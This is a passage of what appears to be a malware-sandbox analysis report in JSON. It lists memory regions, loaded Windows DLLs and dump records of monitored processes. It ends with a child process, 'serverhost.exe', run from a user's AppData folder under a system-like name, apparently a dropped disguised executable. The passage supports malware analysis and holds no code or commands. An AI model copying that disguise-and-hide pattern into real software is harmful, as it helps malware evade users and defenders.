"norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:00:50.436", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_791", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:00:50.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_792", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:00:50.439", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_793", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:50.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_794", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:50.441", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_795", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:50.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_796", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:50.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20774912, "type": "region", "version": 1 }, "end_va": 23719935, "entry_point": 20774912, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_797", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20774912, "timestamp": "00:00:50.621", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000798-addr_0x00000000003b0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3919871, "entry_point": 0, "filename": null, "id": "region_798", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:50.691", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957633181, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_799", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:00:52.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_800", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:52.409", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947729920, "type": "region", "version": 1 }, "end_va": 1947783167, "entry_point": 1947734496, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_801", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947729920, "timestamp": "00:00:52.413", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_802", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:00:52.416", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000803-addr_0x0000000001220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 19005440, "type": "region", "version": 1 }, "end_va": 20054015, "entry_point": 0, "filename": null, "id": "region_803", "name": "private_0x0000000001220000", "norm_filename": null, "region_type": "private_memory", "start_va": 19005440, "timestamp": "00:00:52.417", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000804-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_804", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:52.417", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 102400, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4100095, "entry_point": 0, "filename": null, "id": "region_805", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:00:52.419", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000806-addr_0x00000000016a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 23724032, "type": "region", "version": 1 }, "end_va": 24772607, "entry_point": 0, "filename": null, "id": "region_806", "name": "private_0x00000000016a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 23724032, "timestamp": "00:00:54.422", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000807-addr_0x00000000017a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 24772608, "type": "region", "version": 1 }, "end_va": 25821183, "entry_point": 0, "filename": null, "id": "region_807", "name": "private_0x00000000017a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24772608, "timestamp": "00:00:54.422", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000808-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_808", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:00:54.423", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000809-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_809", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:54.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 20054016, "type": "region", "version": 1 }, "end_va": 20430847, "entry_point": 20054016, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_810", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 20054016, "timestamp": "00:00:54.424", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 20054016, "type": "region", "version": 1 }, "end_va": 20430847, "entry_point": 20198841, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_811", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 20054016, "timestamp": "00:00:54.431", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1966342144, "type": "region", "version": 1 }, "end_va": 1966391295, "entry_point": 1966346465, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_812", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1966342144, "timestamp": "00:00:54.433", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1939668992, "type": "region", "version": 1 }, "end_va": 1939931135, "entry_point": 1939710685, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_813", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1939668992, "timestamp": "00:00:54.434", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000814-addr_0x00000000018a0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 25821184, "type": "region", "version": 1 }, "end_va": 26869759, "entry_point": 0, "filename": null, "id": "region_814", "name": "private_0x00000000018a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 25821184, "timestamp": "00:00:54.436", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000815-addr_0x00000000019a0000-size_0x00000000000d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 851968, "start_va": 26869760, "type": "region", "version": 1 }, "end_va": 27721727, "entry_point": 0, "filename": null, "id": "region_815", "name": "private_0x00000000019a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 26869760, "timestamp": "00:00:54.437", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 27721728, "type": "region", "version": 1 }, "end_va": 28635135, "entry_point": 0, "filename": null, "id": "region_816", "name": "pagefile_0x0000000001a70000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27721728, "timestamp": "00:00:54.438", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4005887, "entry_point": 0, "filename": null, "id": "region_817", "name": "pagefile_0x00000000003d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3997696, "timestamp": "00:00:54.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1948975104, "type": "region", "version": 1 }, "end_va": 1950670847, "entry_point": 1949165237, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_818", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1948975104, "timestamp": "00:00:54.442", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 4063232, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_819", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 4063232, "timestamp": "00:00:54.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_820", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:00:54.444", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_821", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:00:54.449", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_822", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:00:54.450", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6291456, "type": "region", "version": 1 }, "end_va": 6295551, "entry_point": 0, "filename": null, "id": "region_823", "name": "pagefile_0x0000000000600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6291456, "timestamp": "00:00:54.451", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_824", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:00:54.453", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_825", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:00:54.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_826", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:00:54.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 20054016, "type": "region", "version": 1 }, "end_va": 20070399, "entry_point": 20054016, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_827", "name": "cversions.1.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 20054016, "timestamp": "00:00:54.458", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 155648, "start_va": 20119552, "type": "region", "version": 1 }, "end_va": 20275199, "entry_point": 20119552, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_828", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 20119552, "timestamp": "00:00:54.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 20316160, "type": "region", "version": 1 }, "end_va": 20320255, "entry_point": 0, "filename": null, "id": "region_829", "name": "pagefile_0x0000000001360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 20316160, "timestamp": "00:00:54.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 20054016, "type": "region", "version": 1 }, "end_va": 20070399, "entry_point": 20054016, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_830", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 20054016, "timestamp": "00:00:54.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 20381696, "type": "region", "version": 1 }, "end_va": 20578303, "entry_point": 20381696, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_831", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 20381696, "timestamp": "00:00:54.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 20578304, "type": "region", "version": 1 }, "end_va": 20594687, "entry_point": 20578304, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_832", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 20578304, "timestamp": "00:00:54.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 26869760, "type": "region", "version": 1 }, "end_va": 27287551, "entry_point": 26869760, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_833", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 26869760, "timestamp": "00:00:54.475", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000834-addr_0x0000000001a30000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 27459584, "type": "region", "version": 1 }, "end_va": 27721727, "entry_point": 0, "filename": null, "id": "region_834", "name": "private_0x0000000001a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 27459584, "timestamp": "00:00:54.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 20643840, "type": "region", "version": 1 }, "end_va": 20647935, "entry_point": 0, "filename": null, "id": "region_835", "name": "pagefile_0x00000000013b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 20643840, "timestamp": "00:00:54.482", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 20643840, "type": "region", "version": 1 }, "end_va": 20672511, "entry_point": 0, "filename": null, "id": "region_851", "name": "pagefile_0x00000000013b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 20643840, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 27328512, "type": "region", "version": 1 }, "end_va": 27336703, "entry_point": 0, "filename": null, "id": "region_852", "name": "pagefile_0x0000000001a10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27328512, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 27394048, "type": "region", "version": 1 }, "end_va": 27398143, "entry_point": 0, "filename": null, "id": "region_853", "name": "pagefile_0x0000000001a20000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27394048, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 28639232, "type": "region", "version": 1 }, "end_va": 32780287, "entry_point": 0, "filename": null, "id": "region_854", "name": "pagefile_0x0000000001b50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28639232, "timestamp": "00:00:54.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1967915008, "type": "region", "version": 1 }, "end_va": 1968074751, "entry_point": 1967937721, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_879", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1967915008, "timestamp": "00:00:54.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970151423, "entry_point": 1970082881, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_880", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:00:54.519", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1991495679, "entry_point": 1989810151, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_881", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:54.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_882", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:00:54.522", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_5", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000883-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 